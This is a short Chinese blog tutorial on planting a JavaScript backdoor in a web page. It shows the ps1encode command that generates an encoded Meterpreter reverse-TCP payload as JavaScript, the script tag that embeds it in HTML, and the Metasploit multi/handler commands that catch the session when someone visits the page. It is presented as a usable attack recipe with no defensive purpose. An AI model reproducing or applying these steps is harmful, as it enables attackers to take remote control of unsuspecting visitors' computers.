JavaScript后门嵌入网页的利用

JavaScript后门创建与使⽤

前言

  今天介绍一种小众的js后门获取shell,使用ps1encode来加密反弹后门。

  工具地址:https://github.com/CroweCybersecurity/ps1encode

 

正文

  在文件目录下用下面的命令生成反弹shell的js代码,填入监听机的ip和port

./ps1encode.rb --LHOST [Port] --LPORT [Port] --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js

  成功生成js代码

   将上面加密后的js代码保存到一个.js的文件中

  通过js语法,将刚刚保存的js文件内嵌到html中

<script src="u.js"></script>

  此时在msf中开启监听

msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > set lhost 192.168.80.131
msf6 exploit(multi/handler) > run
  当访问带有js的html⽹⻚时,kali成功获取到会话
posted @   小小小怪将军  阅读(670)  评论(0编辑  收藏  举报
编辑推荐:
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析
· 没有源码,如何修改代码逻辑?
阅读排行:
· 分享4款.NET开源、免费、实用的商城系统
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 记一次.NET内存居高不下排查解决与启示
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
点击右上角即可分享
微信分享提示